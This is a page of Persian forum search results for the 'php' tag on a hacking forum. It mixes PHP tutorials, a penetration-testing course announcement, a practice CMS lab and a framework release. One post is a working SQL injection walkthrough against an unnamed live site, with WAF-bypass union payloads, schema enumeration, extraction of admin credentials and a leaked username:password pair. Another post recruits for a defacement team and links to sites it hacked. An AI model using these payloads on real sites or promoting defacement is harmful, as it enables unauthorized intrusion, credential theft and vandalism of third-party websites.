جستجو در تالارهای گفتگو
در حال نمایش نتایج برای برچسب های 'php'.
28 نتیجه پیدا شد
-
آموزش تصویری آموزش تصویری دوره کامل تست نفوذ با زیرنویس فارسی
mownten پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری
با سلام خدمت کلیه دوستان و اساتید امروز تصمیم گرفتم که دوره آموزش تست نفوذ همراه با زیرنویس فارسی در اختیار همه علاقمندان بذارم تا بتونن با کار های ضروری تست نفوذ آشنا بشن. این دوره توسط آقای مالکوم شور آموزش داده میشه. سرفصل ها: 00- معرفی (3 ویدیو - ~3 دقیقه) 01- تست نفوذ چیست؟ (2 ویدیو - ~16 دقیقه) 02- ابزار تست نفوذ (6 ویدیو - ~28 دقیقه) 03- اسکریپت نویسی بش (3 ویدیو - ~6 دقیقه) 04-اسکریپت نویسی پایتون (7 ویدیو - ~21 دقیقه) 05- کالی و متااسپلویت (7 ویدیو - ~25 دقیقه) 06-تست نفوذ وب (4 ویدیو - ~16 دقیقه) 07-درک کدهای اکسپلویت (4 ویدیو - ~35 دقیقه) 08- جمع بندی (1 ویدیو - ~2 دقیقه) طول دوره : جمعا 2 ساعت و 29 دقیقه درجه بندی سطح: متوسط ( Intermediate ) من هر قسمت رو با فاصله ارسال میکنم. چونکه اول باید زیرنویس رو ترجمه کنم بعد استارتر رو بهش بچسبونم و کلی دردسر دیگه. از فصل دو به بعد هم موارد آموزشی یه خورده تخصصی میشن و نیاز به حفظ کردن و تسلط دارن. پس توی فاصله ی بین هر آموزش هم سعی کنید با تکرار عملی آموزشی ها، اونا رو یاد بگیرید. آموزش ها حاوی فایل ویدیویی بهمراه زیرنویس فارسی هستن تا بتونید روی هر دستگاهی اونا رو مشاهده کنید. بدلیل آموزشی بودن پست به هیچ وجه اقدام به ارسال اسپم جهت تشکر و یا پرسیدن سوال نکنید. اگر ابهام، مشکل و یا سوالی داشتید بصورت خصوصی بپرسید ، تشکر هم که دکمه داره. اسپم ممنوع پسورد کلیه فایل های فشرده هم : guardiran.org امیدوارم لذت ببرید. کیفیت ویدیو ها : HD 720p چنانچه استقبال خوبی بشه، در سطح گسترده انواع آموزش ها رو ارائه خواهیم داد. از همینجا اعلام میکنم که ویدیوی آموزشی بدون واترمارک هست و امکان انتشار و اشتراک ویدیو وجود داره. پس باید بگم که مسئولیت هرگونه سوءاستفاده از دوره های آموزشی فقط و فقط بر عهده کاربر خاطی هست. -
با سلام خدمت دوستان عزیز تابع file_get_contents در php یک از توابع مدیریت فایل ها در این زبان است . این تابع تمام اطلاعات داخل فایل یا url داده شده را به عنوان یک رشته می خواند . خواندن فایل: $data = file_get_contents('file.txt'); echo $data; در اینجا محتویات فایل file.txt به صورت رشته در متغیر data ذخیره میشود. خواندن فایل از ادرس: $data = file_get_contents('[Hidden Content]'); echo $data; در این کد محتوایت این ادرس که به صورت txt هست در متغیر data ذخیره و در خط دوم نمایش داده میشود. موفق و پیروز باشید.
-
با سلام خدمت دوستان در این ویدئو یک تابع ساده رو با php نوشتم جهت ساخت لاگ و بررسی بازدید کنندگان یک صفحه که در ویدئو های بعد این رو ارتقا میدیم. لینک ویدئو در آپارات: [Hidden Content] کد ها: <?php function add_log($dir){ $dir = 'logs'; $filename = $dir.'/'.$_SERVER['REMOTE_ADDR'].'.php'; if(!is_file($filename)){ $fh = fopen($filename,'a'); fwrite($fh,"<?php die(); ?>\n"); fclose($fh); } $log = "Date: ".date('Y/m/d h:i:s')." User Agent: ".$_SERVER['HTTP_USER_AGENT']." URL: ".$_SERVER['REQUEST_URI']."\n"; $fh = fopen($filename,'a'); fwrite($fh,$log); fclose($fh); } add_log('logs'); موفق و پیروز باشید.
-
- php
- programming
-
(و 2 مورد دیگر)
برچسب زده شده با :
-
حمله Dos با PHP
Hackwin پاسخی ارسال کرد برای یک موضوع در سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
سلام دوستان ساختار اعمال ترافیک بر روی وبسایت ها چطور هست؟ برای مثال وقتی با ping تو cmd win اقدام به Dos میکنیم، در واقع چه نوع درخواست هایی برای سرور ارسال شده؟ و اینکه آیا با php هم این امر ممکنه؟ و اگه بله چطور؟ -
با سلام خدمت دوستان عزیز امروز میخوایم باهم یک صفحه ورود بدون داشتن دیتابیس بسازیم که در کنارش صفحه ثبت نام هم موجوده و کاربران میتونن ثبت نام کنن. نوشتن صفحه ثبت نام: قدم اول :خب قدم اول توی نوشتن صفحه ثبت ناممون کد های html هست که یک فایل با نام register.php بسازید و کد های زیر رو قرار بدید: <!DOCTYPE html> <html> <head> </head> <body> <form method="post"> Username: <input type="text" name="username"> <br><br> Password: <input type="password" name="password"> <br><br> Confirm password: <input type="password" name="confirm_password"> <br><br> Email: <input type="email" name="email"> <br><br> <input type="submit" name="register" value="register"> </form> </body> </html> در اینجا چهار input داریم که شامل نام کاربری، رمز عبور ، تکرار رمز عبور و ایمیل میشه و در نهایت یک دکمه ثبت نام. قدم دوم : یک فایل با نام users.php بسازید و این کد رو خط اول قرار بدید: <?php die('403'); ?> خب در فایل users.php اطلاعات کاربران اعم از username و password و email قرار میگیره که از تابع die اول کدمون استفاده کردیم که اگر یک نفر این فایل رو توی سایت اجرا کرد خطای 403 بگیره. قدم سوم: حالا برمیگردیم به فایل register.php که کد های php اونو بزنیم یعنی: <?php if (isset($_POST['register'])) { if (!$_POST['username']==''&&!$_POST['password']==''&&!$_POST['confirm_password']==''&&!$_POST['email']==''){ // check confirm password if ($_POST['password']==$_POST['confirm_password']) { // add user // open file (file handle) $fh = fopen('users.php','a'); // set user data $user = 'USERNAME:'.md5(sha1($_POST['username'])).',PASSWORD:'.md5(sha1($_POST['password'])).',EMAIL:'.base64_encode($_POST['email'])."\n"; // write user information fwrite($fh,$user); // close users file fclose($fh); } }else{ echo '<p style="color:red">Please answer all options.</p>'; } خط ۲ : از if استفاده کردیم برای بررسی اینکه کاربر دکمه register رو کلیک کرده یا نه خط ۴ : بررسی کردیم که ایا تمام ایپویت ها رو وارد کرده کاربر یا نه خط ۶ : بررسی کردیم که آیا رمز عبود و تکرار رمز عبور دقیقا یکی هست یا نه اگه آره که بریم سراغ اضافه کردن کاربر خط ۱۰ : وارد فایل users.php که قبلا ساختیم میشیم و میشه file handle ما خط ۱۳ : توی متغیر user اطلاعات کاربر رو قرار میدم یعنی نام کاربری ، رمز عبود و ایمیل که نام کاربری و رمز عبود به صورت هش شده و ایمیل به صورت encode قرار میگیره. خط ۱۶ : با تابع fwrite در آخر فایل users.php متغیر user رو اضافه میکنیم. خط ۱۹ : فایل users.php رو میبندیم خط ۲۲ و ۲۳ : نمایش خطا زمانی که تمام اینپوت ها رو کاربر وارد نکرده که میشه else شرطمون (خط ۴) کد نهایی: <!DOCTYPE html> <html> <head> </head> <body> <form method="post"> Username: <input type="text" name="username"> <br><br> Password: <input type="password" name="password"> <br><br> Confirm password: <input type="password" name="confirm_password"> <br><br> Email: <input type="email" name="email"> <br><br> <input type="submit" name="register" value="register"> </form> </body> </html> <?php if (isset($_POST['register'])) { if (!$_POST['username']==''&&!$_POST['password']==''&&!$_POST['confirm_password']==''&&!$_POST['email']==''){ // check confirm password if ($_POST['password']==$_POST['confirm_password']) { // add user // open file (file handle) $fh = fopen('users.php','a'); // set user data $user = 'USERNAME:'.md5(sha1($_POST['username'])).',PASSWORD:'.md5(sha1($_POST['password'])).',EMAIL:'.base64_encode($_POST['email'])."\n"; // write user information fwrite($fh,$user); // close users file fclose($fh); } }else{ echo '<p style="color:red">Please answer all options.</p>'; } } نوشتن صفحه ورود: قدم اول: یک فایل با نام login.php بسازید و کد های html زیر رو قرار بدید: <!DOCTYPE html> <html> <head> </head> <body> <form method="post"> Username: <input type="text" name="username"> <br><br> Password: <input type="password" name="password"> <br><br> <input type="submit" name="login" value="login"> </form> </body> </html> (اگه دوست داشته باشید میتونید بهش استایل هم بدید ولی برای اینکه آموزش طولانی نشه ما اینکارو نمیکنیم) قدم دوم : کد های php: <?php if (isset($_POST['login'])&&isset($_POST['username'])&&isset($_POST['password'])) { $file_handle= fopen('users.php','r'); $users=fread($file_handle,filesize('users.php')); $users=explode("\n",$users); $user_id=''; for ($i=0;$i<count($users)-1;$i++) { // check username if (strstr($users[$i],md5(sha1($_POST['username'])))) { $user_id .= $users[$i]; // check password if (strstr($user_id,md5(sha1($_POST['password'])))) { $login='true'; } } } if (isset($login)&&$login=='true') { $user_email = str_replace('USERNAME:'.md5(sha1($_POST['username'])).',PASSWORD:'.md5(sha1($_POST['password'])).',EMAIL:','',$user_id); session_start(); $_SESSION['login']='true'; $_SESSION['name']=$_POST['username']; $_SESSION['email']=base64_decode($user_email); header('Location: panel.php'); exit; }else{ echo '<p style="color:red;">username and password is wrong!</p>'; } } خب به صورت کلی بخوایم توضیح بدیم که چه اتفاقی افتاده میگیم که اول چک میکنه که ایا username,password ارسال شده یا نه بعد میاد فایل users.php رو باز میکنه با mode خواندن یا read بعد متغیر users رو مساوی با داده های فایل users.php قرار میده حالا میایم دوباره متغیر users رو تعریف میکنیم و با استفاده از تابع explode هر اینتری که توی فایل هست(میشه همون متغیر users) رو توی یک اندیس ارایه قرار میدم. یک متغیر user_id هم تعریف میکنیم چون بعدا ازش میخوایم استفاده کنیم خطای undefined var نده بهمون توی for میایم روی اندیس های آرایه users کار میکنیم و با یک if دونه دونه یوزر ها رو بررسی میکنیم با هش شده ی یوزرنیمی که برامون ارسال شده بعد اگر درست بود یعنی اون اندیس یا همون خط، اطلاعات یوزر ما هست که قرارش میدیم توی user_id و البته از .= که استفاده کردیم به این معنیه : $user_id = $user_id + $users[$i]; که اگر از قبل user_id رو تعریف نمیکردیم خطا میداد و دلیل اینکه از .= استفاده کردیم این بود که قراره توی بخش های بعد ازش استفاده کنیم. خب بعد اومدیم دوباره با یک if بررسی کردیم و با تابع strstr چک کردیم که آیا پسورد (به صورت هش شده) وجود داره توی اون اندیس یا نه در واقع پسورد رو بررسی میکنیم. و اگر درست بود میایم متغیر لاگین رو مساوی با true قرار میدیم که یعنی این شخص لاگینش انجام شده. جلوتر میایم میگیم اگر login شده بود بیا توی این شرط که اول میایم ایمیل رو از اون user خارج میکنیم و میزاریم توی متغیر email که روش های مختلفی میشه این کارو انجام داد ولی من از str_replace استفاده کردم حتی از explode هم میشه استفاده کرد و... در نهایت session رو استارت کردیم و session ها رو ست کردیم که من اومدم name رو مساوی با یوزر نیم و email رو مساوی با ایمیل شخص (با توجه به یوزرنیم و پسوردی که وارد کرده) به صورت دیکد قرار دادم. و هدر کردم به پنل که شما میتونید این قسمتش رو با توجه به کاری که میخواید انجام بدید تغییر بدید. و یک else هم داریم برای زمانی که یوزر و پسورد اشتباه هست ارور بده. کد نهایی پیج لاگین: <!DOCTYPE html> <html> <head> </head> <body> <form method="post"> Username: <input type="text" name="username"> <br><br> Password: <input type="password" name="password"> <br><br> <input type="submit" name="login" value="login"> </form> </body> </html> <?php if (isset($_POST['login'])&&isset($_POST['username'])&&isset($_POST['password'])) { $file_handle= fopen('users.php','r'); $users=fread($file_handle,filesize('users.php')); $users=explode("\n",$users); $user_id=''; for ($i=0;$i<count($users)-1;$i++) { // check username if (strstr($users[$i],md5(sha1($_POST['username'])))) { $user_id .= $users[$i]; // check password if (strstr($user_id,md5(sha1($_POST['password'])))) { $login='true'; } } } if (isset($login)&&$login=='true') { $user_email = str_replace('USERNAME:'.md5(sha1($_POST['username'])).',PASSWORD:'.md5(sha1($_POST['password'])).',EMAIL:','',$user_id); session_start(); $_SESSION['login']='true'; $_SESSION['name']=$_POST['username']; $_SESSION['email']=base64_decode($user_email); header('Location: panel.php'); exit; }else{ echo '<p style="color:red;">username and password is wrong!</p>'; } } نکته: دوستان عزیز توی پیج ریجستر یک باگ خطرناک داریم که به شکل یک چالش میتونید بهش نگاه کنید، اگر دوستان تمایل داشتید در پایین تاپیک باگ رو ارائه بدید و همچنین نحوه پچ کردنش چون احتملا تا چند روز دیگه ادامه تاپیک نحوه بستن آسیب پذیری و نحوه استفاده از اون رو گداشتیم و یکم ریزه کاری پیج لاگین. موفق و پیروز باشید.
-
- بایگاه داده
- صفحه ورود بدون دیتابیس
- (و 18 مورد دیگر)
-
سلام باز هم منم 🙂 من دیدم مطالب کد های زیادی در مورد برنامه نویسی دارم گفتم این تاپیک رو بسازم که کد ها رو داخل این تاپیک بزارم یا اگر چیزی خواستم اضافه کنم اینجا اضافه کنم که اسپم نشه تو این تاپیک قطع کد های مفید از زبان های برنامه نویسی (بیشتر زبان های برنامه نویسی وب) رو میزارم خوشحال میشم اگر شما هم کدی داشتید اینجا به اشتراک بزارید ممنون که منو تحمل می کنید 🙂 به امید موفقیت همه هکر های ایرانی 🌹
-
به نام خدا سلام یک ویدیو ی ساده در مورد این موضوع تهیه کردم. Video.rar
-
msa service خدمات MR.MSA | ورژن 1.8 | ورژن 2 به زودی
Sadra پاسخی ارسال کرد برای یک موضوع در تارگت های تمرینی
MSACMS با سلام خدمت تمام دوستان و مدیران عزیز سایت گاردایران در این تاپیک برای شما یک خدماتی رو می خواهم ارائه بدهم نام خدمات msacms هست که سه cms : 1.wordpress 2.drupal 3.joomla رو بالا اوردم تا بتوانید به صورت رایگان با cms ها کار کنید و اسیب پذیری و باگ پرایوت پیدا کنید ، همچنین اسیب پذیری توی در پوسته ها و پلاگین ها و .... این خدمات مثل یک ازمایشگاه می مونه که مثلا : شما میای روی یکی از cms های دلخواه تست اسیب پذیری انجام می دهید و روی پلاگین های ورژن دلخواه و پوسته دلخواه و ... و مثلا یه کسی که خیلی بلد نیست میاد و کار با cms رو یاد میگیره . و هر دوستی اگر خواست درخواست می دهد و یه cms به صورت دلخواه با ورژن دلخواه برای اون نصب می شود . ادرس خدمات MSACMS : MR-MSA.XYZ : username & password یوزرنیم و پسورد cms ها : guardiran اما زمانی که شما یک cms رو انتخاب می کنید یه یوزر و پسورد می خواد که خیلی قوی هست و فقط یک بار باید بزنید .(برای امنیت بالا این کار انجام شده که هر فردی نتواند استفاده کند ) در ورژن ۱ برای دریافت یوزرنیم و پسورد به صورت خصوصی در سرور discord گاردایران و یا در قسمت پیام رسانی گاردایران باید به من پیام می دادید ، اما در ورژن ۱.۲.۰ برای شما یوزر و پسورد رو در فایل ضمیمه قرار دادم . (در تایپک دوم موجود است ) ------------------------------------------------------------------------------------------------------------------------------------------------------------- نکات مهم زمان استفاده از سایت : ۱- پسورد و یوزر cms ها همیشه guardiran هست و نباید تعویض گردد . ۲- هر روز cms ها چک می شود . ۳- هر ۳ روز یک بار در صورت لزوم cms ها ریست می شوند . ۴- فقط تا ۳ فایل و حداکثر ۱۰ مگابایت می تونید اپلود کنید . ۵- برای دریافت رمز عبور حتما باید در انجمن گاردایران ثبت نام کنید . ۶- اگر یک زمان خواستید برای مثال ببینید که می توان در این اپلودر شل اپلود کرد یا نه به جای شل از یک فایل php استفاده کنید . ۷- هیچ زمان شل اپلود نکنید ، چون اکانت شما به صورت خودکار بن می شود و دیگر قابل برگشت نیست (به دلیل شناسایی فایروال ) ۸- هیچ زمان به سایت حملات ddos نزنید چون موفق نمی شوید . ۹ - این cms به صورت مداوم بروز می شود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- امنیت سرور : DDOS در حملات دیداس به شبکه خود دیتاسنتر وارد عمل می شود و آنتی دیداس را فعال می کند در حملات دیداس به سایت ها بخاطر مانیتورینگ لحظه ای که سرور دارد سریعا دسترسی به ایران محدود می شود تا حملات خنثی شود . Firewall در ورژن ۱ سرور دارای فایروال نرم افزاری CSV بود اما در ورژن ۱.۲۰ فایروال cloudflare رو هم اضافه کردیم . Shell سرور دارای انتی شل است و به علاوه فایروال مانع اجرا و استفاده از شل می شود . Backup سایت روزانه بک اپ گیری می شود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- امنیت سایت : سعی کردم روی امنیت سایت کار کنم و سایتی با خدمات خوب و البته امنیت بالا ارائه بدهم و در آینده امنیت بالا تر رفته و سایت بهبود می بخشد. ------------------------------------------------------------------------------------------------------------------------------------------------------------- گزارش باگ : اگر دوستی با باگی در خود سایت مواجه شد و یا دوست داشت مورد امنیتی رو در رابطه با خود سایت گزارش بدهد به صورت خصوصی به من گزارش بده تا رفع بشود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- CMS مورد نظر : اگر دوستی cms خواست تا براش نصب کنم به من پیام خصوصی بدهد . اطلاعات شامل : نوع cms ورژن مورد نظر لینک دانلود ------------------------------------------------------------------------------------------------------------------------------------------------------------- قوانین تاپیک : هر سوال داشتید در بخش سوال و جواب ها ، در غیر این صورت پاسخ داده نمی شود . انتقادات و پیشنهادات خودتون رو به صورت خصوصی به من ارسال کنید . مشکلات و خطا ها رو به صورت خصوصی ارسال کنید . ------------- ------------- ------------- تایید شده توسط مدیران بخش : R3DN4X314 و proxy ------------- ------------- ------------ ورژن 1.0.0 رونمایی می کند : mr-msa.xyz ورژن 1.2.0 رونمایی می کند : mr-msa.xyz ورژن 1.3.0 رونمایی می کند : mr-msa.xyz ورژن 1.4.0 رونمایی می کند : mr-msa.xyz ورژن 1.5.0 رونمایی می کند : mr-msa.xyz این خدمات به صورت کامل متعلق به انجمن تیم امنیتی گاردایران بوده و هر گونه کپی برداری ، اسیب رساندن به خدمات و ... تخلف محسوب می شود و پیگرد قانونی دارد .- 8 پاسخ
-
- msacms tools
- بلودیت
-
(و 79 مورد دیگر)
برچسب زده شده با :
- msacms tools
- بلودیت
- wordpress xss
- wordpress 5.5
- cms security
- ssrf
- bug privet
- تایپو ۳
- mr-msa.xyz
- جوملا
- rfi
- sql injection
- وردپرس
- sqli
- typo3 cms
- bug crowd
- bug bounty
- csrf
- تمرین تست نفوذ و یادگیری cms ها
- wordpress
- joomla
- msacms
- آزمایشگاه تحلیل باگ
- cms
- shell
- آزمایشگاه تست نفوذ
- uploader
- آموزش cms
- web application bug
- madesimple
- bug
- bludit
- cms typo3
- باگ
- lfi rfi
- webapplication hacking
- rfu
- bludit cms
- msacms+
- concrete5
- cms bludit
- cmsmadesimple
- sql injention
- تست امنیت
- waf
- upload
- upload shell
- wordpress them
- database mysql
- firewall
- باگ پرایوت و مکان ازمایشگاهی با msacms | ورژن 1.5.0
- آزمایشگاه
- .xyz
- سیستم مدیریت محتوا
- wordpress 5.5.3
- mr-msa
- hack
- waf bypassing
- امنیت
- typo3
- program
- php
- tools
- web security
- دروپال
- rce
- web application firwall
- اموزش
- web application security
- lfi
- mr.msa
- xss
- drupal
- .cf
- wordpress 5.6
- security
- web design
- web developer
- html
- css
- js
-
𝕚𝕟 𝕥𝕙𝕖 𝕟𝕒𝕞𝕖 𝕠𝕗 𝕘𝕠𝕕 با سلام و احترام خدمت تیم محترم 𝓰𝓾𝓪𝓻𝓭𝓲𝓻𝓪𝓷 در این تاپیک آموزش Html,Css را قرار خواهم داد ودر در دوره های بعدی با html5,css3 و جی کوئری ، بوت استرپ 4 ، پایگاه داده mysql و زبان برنامه نویسی php آشنا خواهید شد پس لطفا در تاپیک ها اسپم وارد نکنید و برای ادامه آموزش ها تاپیک ها را بپسندید
- 8 پاسخ
-
- sqlinjection
- sql
-
(و 19 مورد دیگر)
برچسب زده شده با :
-
••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.•• با سلام خدمت کاربران محترم انجمن گاردایران در این تاپیک قصد دارم تارگت با نکات خاص رو خدمتتون آموزش بدم ولی قبلش باید یادآوری کنم که این آموزش ها فقط برای آشنایی و یادگیری شماست هر گونه استفاده ی غیرمجاز به عهده ی خود شماست ! در ضمن دوستان عزیزی که به ضمینه ی هک و امنیت علاقه مند هستند میتوانند این آموزش هارو دنبال کنند و با مراجعه به تاپیک های قبلی بنده میتونید این آموزش رو از اول یاد بگیرید چون در اینجا فقط به نکات اشاره خواهد شد نکته : هک ر شدن بچه بازی نیست که بخوای برای آسیب رسوندن به دیگران یا تفریح یادبگیری اگر اهدافت برای یادگیری هک اینه همین الان میتونی اینجارو ترک کنی تارگت : [Hidden Content] با قرار دادن ' آسیب پذیری مشخص خواهد شد [Hidden Content]' حال به سراغ دستورات بعدی برای پیدا کردن ستون های سایت میرویم با استفاده از دستور [Hidden Content] order by 99999-- بسیار خب میبینیم که به کلمه ی order حساس هستش پس بایپس کلمه ی order رو قرار میدیم -> group [Hidden Content] group by 99999-- صفحه load میشود در صورتی که نباید load َود چون هیچ سایتی انقدر ستون ندارد پس بایپسشو قرار میدیم [Hidden Content]' group by 99999--+ انقدر اعداد رو کم میکنیم تا صفحه load شود به 25 خواهیم رسید بدین صورت [Hidden Content]' group by 25--+ حال باید دستورات بعدی برای بیرون کشیدن database اعمال کنیم برای راحتی کارشما که شاید برنامه Hackbar روی مرورگرتون نصب نباشه لیست اعداد رو تهیه کردم که بتونید راحت جای گذاری کنید union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70 خب دستورات رو وارد میکنیم بدین شکل [Hidden Content]' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+ ولی با یک Error معروف رو به رو خواهیم شد پس با دستور /*!00000union*/ بایپس میکنیم [Hidden Content]' /*!00000union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+ خب حالا میریم سراغ بیرون کشیدن table های سایت [Hidden Content]' /*!00000union*/ select 1,2,3,4,5,6,group_concat(table_name,0x3c62723e),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=database()--+ میبینیم که دوباره با Error معروف Not Acceptable! مواجه خواهیم شد خیلی راحت با دستوراتی که خدمتتون عرض کردم بایپس کنید بدین شکل [Hidden Content]%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(table_name,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+/*!00000information_schema.tables*/+/*!00000where*/+table_schema=database()--+ سایتی رو معرفی میکنم که برای hex کردن متن کمکتون میکنه Text To Hex بسیار خب میریم سراغ دستورات بعدی شروع به hex کردن admin_log میکنیم و در دستور قرار میدیم (اگر با دستورات آشنا نیستی موضوعات قبلی تاپیک های بنده رو ببین ) [Hidden Content]%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(column_name,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+/*!00000information_schema.columns*/+/*!00000where*/+table_name=0x61646d696e5f6c6f67--+ و دستور بعد برای استخراج داده [Hidden Content]%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(uid,0x3a,upass,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+admin_log--+ دوستان عزیز لطفا از آموزش ها سو استفاده نکنید این آموزش ها فقط برای یادگیری شماست پس لطفا کسی رو دیفیس نکنید سعی میکنم هر روز یک تاپیک در مورد تارگت با نکات خاص قرار بدم لطفا در اینجا اسپم نکنید برای ادامه ی آموزش ها فقط تاپیک را بپسندید موفق باشید admin11:admin11 username & password
- 2 پاسخ
-
- sqlinjectin bypass
- دیفیس
- (و 17 مورد دیگر)
-
با سلام خدمت تمامی اساتید انجمن تیم امنیتی گاردایران . این تاپیک برای ارائه ابزار های نوشته شده توسط کاربران دیفیسر گاردایران در سرور دیسکورد هست . که بیشتر ابزار ها رو خودم تاپیکش رو می زارم مگر اینکه نویسنده ابزار موافق نباشد . اعضای دیفیسر (غیر رسمی ) : 1- @proxy 2- @MR.MSA 3- @Dr.Kali 4- @HCSH4C39 5- @mmj-sys 6- @KR0N0S 7- @SHIWPTS13 8- @Scary مشارکت در تیم دیفیس : شما با هر سطح علمی در زمینه هک ، کم(صفر) ، متوسط و حرفه ای می توانید در تیم دیفیس شرکت کنید . برای مشارکت و آموزش و شروع به دیفیس به سرور دیسکورد گاردایران مراجعه کنید . لینک های مهم : سرور دیسکورد گاردایران دیفیسر ها سایت های هک شده توسط تیم امنیتی گاردایران موفق و پیروز باشید .
- 6 پاسخ
-
- python programming
- php
- (و 16 مورد دیگر)
-
تابع date در php سلام در این تاپیک میخواهم تابع date در php را به شما آموزش بدهم. این تابع برای بدست آوردن تاریخ و زمان با فرمت دلخواه استفاده می شود. این متد دو پارامتر دارد که پارامتر اول اجباری و پارامتر دوم اختیاری است: date(format,timestamp); پارامتر اول - format: این پارامتر فرمت تاریخ و زمان را مشخص می کند. مثال: date("Y"); خروجی دستور بالا سال است. (مثلا اگر امسال 2020 باشد دستور بالا 2020 را بر میگرداند) حروف مهم (به حروف کوچک و بزرگ حساس است): a: این حرف am یا pm را در حروف کوچک بر می گرداند. A: این حرف am یا pm را در حروف بزرگ بر می گرداند. d: روز ماه D : روز هفته در سه حرف (مثلا اگر امروز شنبه باشد Sat) l (حروف کوچک L): روز هفته به صورت کامل (مثلا Saturday) F: نام ماه (مثلا January) m: ماه سال به صورت عدد M: ماه سال به صورت سه حرف (مثلا Jan) y: سال به صورت دو رقمی (مثلا 20) Y: سال به صورت چهار رقمی (مثلا 2020) z: روز سال h: ساعت در قالب ۱۲ ساعته H: ساعت در قالب ۲۴ ساعته i: دقیقه s: ثانیه مثال ها: date("Y-m-d"); // 2020-10-31 date("H:i:s"); // 18:34:53 date("Y/M/d-H:i:s"); // 2020/Oct/31-18:36:21 پارامتر دوم - timestamp: این پارامتر اختیاری است و اگر ارسال نشود زمان فعلی در نظر گرفته می شود و اگر به جای زمان فعلی، قصد استفاده از زمان دیگری استفاده کنیم این پارامتر را ارسال می کنیم. مثال: date("Y", mktime(0, 0, 0, 7, 1, 2000));
-
رد فریم ورک - چهارچوب توسعه ایرانی PHP و JavaScript بر پایه الگوی MVC
R3dC0d3r پاسخی ارسال کرد برای یک موضوع در برنامه نویسی
با سلام و درود خدمت تمامی اعضای محترم گارد ایران رد فریم ورک درواقع فریمورکی مدرن ، وابسته به الگوی مدل - ویو - کنترلر با بسیاری ابزار و اجزای ساختار یافته نوشته شده به زبان پی اچ پی و تلفیق شده با فریمورک سمت فرانت (رد جی اس) توسط اینجانب م.عزیزخانی به جهت رشد و پیشرفت جامع برنامه نویسی و استفاده هموطنان عزیز کشورمان توسعه داده شده . بعد از گذشت یک سال ، رد فریم ورک به ورژن 1.0.0 خودش رسیده و در 2 کیت عرضه شده : کیت جامع کیت جامع یک فریم ورک مدل - ویو - کنترلر و چند منظوره به جهت سازماندهی و سرعت بخشی روند توسعه است از برخی اجزای با کیفیت آن می توان به کامپونت های زیر اشاره کرد : موتور پایگاه داده قدرتمند قادر به پشتیبانی سه پایگاه داده معروف (MySQL, SQLServer, SQLite) ، سه جایگاه دیتابیس ، ORM با عملکرد بالا قادر به پیشتیبانی تمامی عملکرد های دیتابیس سیستم کد امنیتی آسان سرویس صندوق پست (SMTP Mail Server) سرویس آپلود امن سرویس ارزیابی ، فیلتر و زدودن رشته سیستم چند زبانه ساختار یافته سیستم مسیر یابی حرفه ای ، مجهز به Middleware ورودی های مدیریت شده (پارامتر های URL ، متد GET ، متد POST و ...) نشست های ساختار یافته و رمز گزاری شده ابزار عیب یابی قدرتمند و ... کیت کنسول اپلیکیشن کیت کنسول اپلیکیشن شامل تمامی اجزای ضروری و سیستم فرمان به جهت توسعه هرچه سریع تر کنسول اپلیکیشن در پی اچ پی آماده سازی شده است . به کمک این کیت قادرید کنسول اپلیکیشن پیشرفته خود را در بستر پی اچ پی توسعه دهید . رد آنالیتیکس رد فریم ورک همراه با یک ابزار قدرتمند به نام رد آنالیتیکس ارائه شده ؛ رد آنالیتیکس یک ابزار چند منظوره هست که به جهت سرعت بخشی روند توسعه مثل اجرای برنامه بر روی سرور توسعه ، تولید کردن کنترلر - مدل - ویو - میدل ور ، آنالیز روت ها یا فرمان های اپلیکیشن در دسترس توسعه دهنده قرار داده شده . رد آنالیتیکس به زبان شیرین جاوا به جهت یک برنامه Cross Platform برنامه نویسی شده ؛ با این حساب توسعه دهنده قابلیت اینو داره که در هر جایی پروژه رد فریم ورکش رو با رد آنالیتیکس توسعه بده ! این ابزار سازگاری لازم با هر دو کیت رو داره رد جی اس رد فریم ورک تعامل جالبی رو با جاوا اسکریپت برای توسع دهندگان فراهم کرده است بنده به جهت نزدیک تر کردن رابطه Back End و Front End دست به توسعه یک فریم ورک جوا اسکریپتی بردم و در حال حاضر این فریم ورک به نسخه 1.0 خودش رسیده . از قابلیت های رد جی اس میتوان به موارد زیر اشاره کرد : پیروی از الگوی طراحی MVC کد نویسی درون تگ های HTML دسترسی آسان به المان و تغییر ویژگی آن ارسال درخواست AJAX مدیریت کوکی ها افکت گرافیکی سرویس ارزیابی ، فیلتر و زدودن رشته نصب و ساخت پروژه ساخت پروژه با کیت جامع از طریق کامپوزر : composer create-project redframework/enterprise ساخت پروژه با کیت کنسول اپلیکیشن از طریق کامپوزر : composer create-project redframework/console-kit ساخت پروژه از طریق ابزار رد آنالیتیکس : * ابزار رد آنالیتیکس در انتهای این پست ضمیمه شده است - مخزن گیت هاب برای توسعه دهندگان کیت جامع کیت کنسول رد جی اس هسته کیت جامع هسته کیت کنسول - لینک های مهم وبسایت رسمی (در دست طراحی) مستندات سوال و جواب های عمومی * هرگونه به روز رسانی و Patch Note در همین تاپیک پست خواهد شد . Red Analytics.jar Offline Docs (1.0).zip- 1 پاسخ
-
- توسعه نرم افزار
- چهارچوب توسعه پی اچ پی
-
(و 4 مورد دیگر)
برچسب زده شده با :
-
